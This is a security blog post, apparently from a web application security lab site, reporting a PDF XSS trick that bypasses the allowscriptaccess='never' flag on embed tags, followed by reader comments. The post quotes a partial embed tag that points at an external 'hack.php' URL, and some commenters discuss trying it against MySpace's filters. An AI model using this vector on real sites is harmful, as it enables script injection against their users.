Cenzic 232 Patent
Paid Advertising
web application security lab

Embed Allowscriptaccess “Never” Subversion

It took me several days to get around to looking at this but indeed, it is definitely worth posting for all you MySpace hackers or people who encounter the allowscriptaccess=”never” flag in Embeds. Yes, it can be subverted - by using PDF XSS:


I recently exploited a website with a vector which is not on your website.. you can use embed with the pdf xss.. the fun thing about this, is that even if the <embed tag has allowscriptaccess set to never, it still executes!

<embed src=”http://www.younggunsdesign.nl/haxorz/hack.php”

Indeed, just as he says, I was able to test this in IE7.0 and get it working (my Firefox install has been severely crippled after the UXSS in PDFs fiasco we saw last month). So I was unable to verify in Firefox, but I’m sure someone else will chime in. Anyway, very nice find by Huib!

7 Responses to “Embed Allowscriptaccess “Never” Subversion”

  1. Wladimir Palant Says:

    RSnake, Firefox should be immune against the PDF XSS. So I guess I wouldn’t be able to verify this even if I had a vulnerable Acrobat version installed.

  2. jason ross Says:

    i tried with firefox using both adobe 8.0.0 and unpatched 7.0.0
    both times firefox loaded the .pdf, but adobe promptly presented an “operation not permitted” error message. (running in windows xp sp2)

  3. Jungsonn Says:

    I wonder if this will work on MySpace due to their flash cross domain policy. Obviously, “alow script access” is only for the flash object itself. Browsers hapily ignore this, it’s only for flash itself to my knowledge. But, if they allow that vector, they have worse problems to think about IMHO.

  4. Awesome AnDrEw Says:

    I don’t screw around with MySpace often as I believe typical user CSS and HTML to be worse than any XSS vulnerability. That being said last time I reviewed the site I believe it filtered any attempts to use anything ending in .php, but that obviously won’t stop anything as once again, it’s MySpace.

  5. SystemOfAHack Says:

    They don’t even allow the embed tags anymore :P
    Well, embeds get converted to object/param tags. Even though one of the param tags contains the embed equivalent of allowScriptAccess=”never”, don’t know if this would change anything.
    Also, I’ve been able to get their filter script to return fragments of the old embed tag parts, which it shouldn’t considering they don’t intend for anyone to be able to use them anymore. Their filter seems a complete mess…

  6. huib Says:

    well, the system I did, had all holes fixed besides this one..
    I didnt know it was possible to insert pdf here,
    but I now wonder, what ELSE is possible?
    I mean, wouldnt shockwave give us a nice xss possibility?
    Im pretty sure there are lots of other types to include,
    which would give us javascript on demand..

    ahwell, either way,
    thanks for posting this!


  7. Jaime Montoya Says:

    Hola, tengo una pregunta. En mi sitio web estoy utilizando objetos SWF que no pertenecen al dominio de mi página. El código que utilizo para tomar estos objetos de otras páginas es por ejemplo el el siguiente:

    Lo que obtengo con eso son objetos Flash dentro de mi página web que serán para escuchar música al darle clic al botón Play. Sin embargo el problema es que luego de haberle dado Play a una canción, si uno minimiza la ventana, se deja de escuchar la música, de manera que para que sea posible escuchar sonido uno tiene que tener visible en la ventana actual por lo menos una parte de los objetos Flash insertados. Aunque sea una esquinita de cualquiera de los objetos insertados en la página debe estar visible en la pantalla actual para poder seguir escuchando el sonido de la música. Si uno pone una ventana encima de todos los objetos Flash insertados, deja de sonar, y si uno minimiza la ventana deja de sonar también (porque los objetos Flash dejan de estar visible). Este problema se da únicamente con Mozilla Firefox. En Internet Explorer uno puede minimizar la ventana y continuar escuchando la música. ¿Tendrá algo qué ver con el allowScriptAccess? Para que comprueben ustedes mismos de qué se trata el problema, les mando en este momento el enlace de la página en la que estoy teniendo este conflicto:


    ¿Podrían ayudarme a solucionar este problema o darme alguna idea de lo que podría estar sucediendo? Gracias.

    By Jaime Montoya